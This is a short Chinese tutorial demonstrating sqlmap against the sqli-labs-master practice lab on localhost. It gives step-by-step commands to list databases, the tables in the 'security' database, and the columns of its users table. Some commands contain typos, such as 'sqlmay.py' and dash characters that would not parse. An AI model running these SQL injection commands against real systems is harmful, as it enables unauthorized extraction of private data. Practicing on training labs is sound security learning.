sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。
GET型的sqlmap爆破。
1.枚举数据库:
Python sqlmay.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –dbs;
2.列出数据库中数据表:
python sqlmap.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –D security –tables(-D security 指定 爆 security数据库中的表)
python sqlmap.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –tables(可以把数据库中的所有表都爆出来)
3.列出users表中字段:
python sqlmap.py -u http://localhost/sqli-labs-master/Less-5/?id=1 -D security -T users --columns